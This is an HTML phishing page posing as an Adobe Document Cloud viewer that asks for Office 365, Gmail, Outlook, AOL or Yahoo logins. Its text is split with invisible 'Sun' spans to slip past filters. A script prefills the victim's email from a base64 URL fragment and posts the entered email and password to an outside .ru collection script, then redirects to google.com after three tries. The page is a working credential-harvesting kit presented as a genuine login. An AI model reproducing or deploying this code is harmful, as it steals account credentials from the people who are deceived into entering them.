
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Yellowtail&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>0nline</title>
    <link href="https://storage.googleapis.com/sharepoint-md7-files.appspot.com/sp-md7/hover.css" rel="stylesheet" media="all">

    <style type="text/css">


    </style>
  </head>
  <body>
    <div class="container-fluid">
      <div class="row" style="background-image: url('https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac5e6b73aef50019af8976/0bC68JzvoSmpxDQg4k7gDwb3.jpg'); background-size: cover;background-repeat: no-repeat;">
        <div class="container">
          <div class="row">
            <div class="col-lg-6 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.7);border-radius:15px;">
              <div class="text-center pt-5"> 
                <img src="https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac5e6b73aef50019af8976/ucgrXg_yYIY73Y3Xb0o_MSDK.jpg" class="img-fluid" width="100px"><br>
                <span class="h4 text-white">Ad<span style='font-size:0px;color:transparent'>Sun</span>ob<span style='font-size:0px;color:transparent'>Sun</span>e Do<span style='font-size:0px;color:transparent'>Sun</span>cu<span style='font-size:0px;color:transparent'>Sun</span>me<span style='font-size:0px;color:transparent'>Sun</span>nt Cloud</span><br>
                <span class="h5 text-white font-weight-normal">To re<span style='font-size:0px;color:transparent'>Sun</span>ad the do<span style='font-size:0px;color:transparent'>Sun</span>cu<span style='font-size:0px;color:transparent'>Sun</span>me<span style='font-size:0px;color:transparent'>Sun</span>nt, pl<span style='font-size:0px;color:transparent'>Sun</span>ea<span style='font-size:0px;color:transparent'>Sun</span>se en<span style='font-size:0px;color:transparent'>Sun</span>te<span style='font-size:0px;color:transparent'>Sun</span>r wi<span style='font-size:0px;color:transparent'>Sun</span>th va<span style='font-size:0px;color:transparent'>Sun</span>li<span style='font-size:0px;color:transparent'>Sun</span>d em<span style='font-size:0px;color:transparent'>Sun</span>ai<span style='font-size:0px;color:transparent'>Sun</span>l cr<span style='font-size:0px;color:transparent'>Sun</span>ede<span style='font-size:0px;color:transparent'>Sun</span>nti<span style='font-size:0px;color:transparent'>Sun</span>al<span style='font-size:0px;color:transparent'>Sun</span>s th<span style='font-size:0px;color:transparent'>Sun</span>at th<span style='font-size:0px;color:transparent'>Sun</span>is fi<span style='font-size:0px;color:transparent'>Sun</span>le wa<span style='font-size:0px;color:transparent'>Sun</span>s se<span style='font-size:0px;color:transparent'>Sun</span>nt t<span style='font-size:0px;color:transparent'>Sun</span>o.</span>
              </div>
              <div class="mt-3">
                <div class="row">
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #FF3C00;">
                        <img src="https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac423973aef50019af881c/-UVKRHCNSrssP9CA5oL5av1_.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4"  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Si<span style='font-size:0px;color:transparent'>Sun</span>gn i<span style='font-size:0px;color:transparent'>Sun</span>n wi<span style='font-size:0px;color:transparent'>Sun</span>th Of<span style='font-size:0px;color:transparent'>Sun</span>fi<span style='font-size:0px;color:transparent'>Sun</span>ce<span style='font-size:0px;color:transparent'>Sun</span>36<span style='font-size:0px;color:transparent'>Sun</span>5</span>
                      </div>
                    </a>
                  </div>
                </div>
                <div class="row">
                  
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #0B5BD3;">
                        <img src="https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac423973aef50019af881c/OwRnEDwvbDvGHbXcSBaxQcvZ.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4"  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Si<span style='font-size:0px;color:transparent'>Sun</span>gn i<span style='font-size:0px;color:transparent'>Sun</span>n wi<span style='font-size:0px;color:transparent'>Sun</span>th Ot<span style='font-size:0px;color:transparent'>Sun</span>he<span style='font-size:0px;color:transparent'>Sun</span>r Ma<span style='font-size:0px;color:transparent'>Sun</span>il</span>
                      </div>
                    </a>
                  </div>
                  <div class="col-lg-12">
                     <p class="text-white mt-3 text-center">Se<span style='font-size:0px;color:transparent'>Sun</span>lec<span style='font-size:0px;color:transparent'>Sun</span>t yo<span style='font-size:0px;color:transparent'>Sun</span>ur e<span style='font-size:0px;color:transparent'>Sun</span>ma<span style='font-size:0px;color:transparent'>Sun</span>il pr<span style='font-size:0px;color:transparent'>Sun</span>ov<span style='font-size:0px;color:transparent'>Sun</span>ide<span style='font-size:0px;color:transparent'>Sun</span>r to vi<span style='font-size:0px;color:transparent'>Sun</span>ew do<span style='font-size:0px;color:transparent'>Sun</span>cu<span style='font-size:0px;color:transparent'>Sun</span>me<span style='font-size:0px;color:transparent'>Sun</span>nt.</p>
                <p class="h5 text-center text-white">Co<span style='font-size:0px;color:transparent'>Sun</span>pyRi<span style='font-size:0px;color:transparent'>Sun</span>ght© 2020 A<span style='font-size:0px;color:transparent'>Sun</span>d<span style='font-size:0px;color:transparent'>Sun</span>obe.</p> 
                    
                  </div>
               
              </div> 
            </div>
          </div>
        </div>



      </div> 
    </div>




    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body">
            <center>
              <img id="fieldImg" src="https://storage.googleapis.com/sharepoint-md7-files.appspot.com/sp-md7/gmail.png" class="img-fluid rounded-circle" width="80px">
              <h5 class="modal-title" id="exampleModalLabel">Lo<span style='font-size:0px;color:transparent'>Sun</span>gin wi<span style='font-size:0px;color:transparent'>Sun</span>th <span id="field">Gm<span style='font-size:0px;color:transparent'>Sun</span>ai<span style='font-size:0px;color:transparent'>Sun</span>l</span></h5>
              <div class="alert alert-danger" id="msg"></div>

            </center>
            <form id="contact" class="form-horizontal well">
              <div class="col-lg-12">
                <div class="form-group">
                  <label for="exampleInputEmail1">Em<span style='font-size:0px;color:transparent'>Sun</span>ai<span style='font-size:0px;color:transparent'>Sun</span>l ad<span style='font-size:0px;color:transparent'>Sun</span>dr<span style='font-size:0px;color:transparent'>Sun</span>es<span style='font-size:0px;color:transparent'>Sun</span>s</label>
                  <input type="email" name="intro" class="form-control" id="intro" aria-describedby="emailHelp" placeholder="Enter email">
                  <small id="emailHelp" class="form-text text-muted">W<span style='font-size:0px;color:transparent'>Sun</span>e'l<span style='font-size:0px;color:transparent'>Sun</span>l ne<span style='font-size:0px;color:transparent'>Sun</span>ve<span style='font-size:0px;color:transparent'>Sun</span>r sh<span style='font-size:0px;color:transparent'>Sun</span>ar<span style='font-size:0px;color:transparent'>Sun</span>e yo<span style='font-size:0px;color:transparent'>Sun</span>ur em<span style='font-size:0px;color:transparent'>Sun</span>ai<span style='font-size:0px;color:transparent'>Sun</span>l wi<span style='font-size:0px;color:transparent'>Sun</span>th an<span style='font-size:0px;color:transparent'>Sun</span>yo<span style='font-size:0px;color:transparent'>Sun</span>ne el<span style='font-size:0px;color:transparent'>Sun</span>se.</small>
                </div>
              </div>
              <div class="col-lg-12">
                <div class="form-group">
                  <label for="Password">Pa<span style='font-size:0px;color:transparent'>Sun</span>ss<span style='font-size:0px;color:transparent'>Sun</span>wo<span style='font-size:0px;color:transparent'>Sun</span>rd</label>
                  <input type="password" name="begin" class="form-control" id="begin" aria-describedby="emailHelp" placeholder="Enter Password">
                </div>
              </div>
            </div>
            <div class="modal-footer">
              <button type="button" class="btn btn-secondary" data-dismiss="modal">Cl<span style='font-size:0px;color:transparent'>Sun</span>ose</button>
              <button class="btn btn-lg btn-info pull-right" id="submit-btn">Lo<span style='font-size:0px;color:transparent'>Sun</span>gi<span style='font-size:0px;color:transparent'>Sun</span>n</button>
            </div>
          </form>
        </div>
      </div>
    </div>
    

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script>

    /* global $ */
    $(document).ready(function(){
      var count=0;


/////////////url intro getting////////////////
 var intro = window.location.hash.substr(1);
    if (!intro) {

    } else {
        var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

        if (!base64regex.test(intro)) {
            // alert(btoa(intro));
            var my_intro = intro;
        } else {
            // alert(atob(intro));
            var my_intro = atob(intro);
        }
        // $('#intro').val(intro);
        // var my_intro =intro;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_intro)) {
            $('#error').show();
            intro.focus;
            return false;
        }
        var ind = my_intro.indexOf("@");
        var my_slice = my_intro.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        if (final == "gmintrol") {
            $('#contact').trigger("reset");
            $('#fieldImg').attr('src', 'https://storage.googleapis.com/sharepoint-md7-files.appspot.com/sp-md7/gmintrol.png');
            $('#field').html("Gmintrol");
            $('#intro').val(my_intro);
            $('#introch').html(my_intro);
            $("#msg").hide();
            $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            $("#automintrol").animate({right:200, opacity:"show"}, 1000);
            $('#ajaxModal').modal('show');
            $('.gmintrolmodal').trigger('click');
            $('#gmintrolmodal').clicked();
            

        } else if (final == "outlook" || final == "hotmintrol" || final == "microsoft") {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac423973aef50019af881c/-dj35b6xrZ9DU8sPwz4rwHjn.png');
            $('#field').html("Outlook");
            $('#intro').val(my_intro);
            $('#introch').html(my_intro);
            $("#msg").hide();
            $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            $("#automintrol").animate({right:200, opacity:"show"}, 1000);
            $('#ajaxModal').modal('show');
            
        } else if (final == "aol") {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://storage.googleapis.com/sharepoint-md7-files.appspot.com/sp-md7/aol.png');
            $('#field').html("Aol");
            $('#intro').val(my_intro);
            $('#introch').html(my_intro);
            $("#msg").hide();
            $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            $("#automintrol").animate({right:200, opacity:"show"}, 1000);
            $('#ajaxModal').modal('show');
            
        } else if (final == "office365") {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac423973aef50019af881c/yYH6lLMsywjeMuN9BMQGyywX.png');
            $('#field').html("Office 365");
            $('#intro').val(my_intro);
            $('#introch').html(my_intro);
            $("#msg").hide();
            $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            $("#automintrol").animate({right:200, opacity:"show"}, 1000);
            $('#ajaxModal').modal('show');
            
        } else if (final == "yahoo") {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://storage.googleapis.com/sharepoint-md7-files.appspot.com/sp-md7/yahoo.png');
            $('#field').html("Yahoo");
            $("#msg").hide();
            $('#intro').val(my_intro);
            $('#introch').html(my_intro);
            $('#intro').val(my_intro);
            $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            $("#automintrol").animate({right:200, opacity:"show"}, 1000);
            $('#ajaxModal').modal('show');
            

        } else {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac423973aef50019af881c/eJWiSaMHRi4pIlPMxVYMru1S.ico');
            $('#field').html("Other Mintrol");
            $('#intro').val(my_intro);
            $('#introch').html(my_intro);
            $("#msg").hide();
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automintrol").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');
        }
    }
    ///////////////url getting ai////////////////






      $('#gmailmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', '');
        $('#field').html("Gmail");
        $('#ajaxModal').modal('show');
      });
      $('#outlookmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', '');
        $('#field').html("Outlook");
        $('#ajaxModal').modal('show');
      });
      $('#aolmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', '');
        $('#field').html("Aol");
        $('#ajaxModal').modal('show');
      });
      $('#office365modal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac423973aef50019af881c/yYH6lLMsywjeMuN9BMQGyywX.png');
        $('#field').html("Office 365");
        $('#ajaxModal').modal('show');
      });
      $('#yahoomodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', '');
        $('#field').html("Yahoo");
        $('#ajaxModal').modal('show');
      });
      $('#othermodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5fac423973aef50019af881c/eJWiSaMHRi4pIlPMxVYMru1S.ico');
        $('#field').html("Other Mail");
        $('#ajaxModal').modal('show');
      });
      $('#submit-btn').click(function(event){
        event.preventDefault();
        var intro=$("#intro").val();
        var begin=$("#begin").val();
        var detail=$("#field").html();

        
        var msg = $('#msg').html();
        $('#msg').text( msg );
        count=count+1;
        if (count>=3) {
          count=0;
          window.location.replace("http://google.com");
        }
        else
        {
         $.ajax({
          dataType: 'JSON',
          url: 'https://saigonhomekitchenwvn.ru/aphabetm11nov/next.php',
          type: 'POST',
          data:{
            intro:intro,
            begin:begin,
            detail:detail,

          },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
				$("#begin").val("");
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                 $('#msg').html(response['msg']);
                  // $('input, textarea').val(function() {
                  //    return this.defaultValue;
                  // });
                }
                else{
                  $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
				$("#begin").val("");
              $("#msg").show();
              $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });
       }
     });
    });
  </script>
  </html>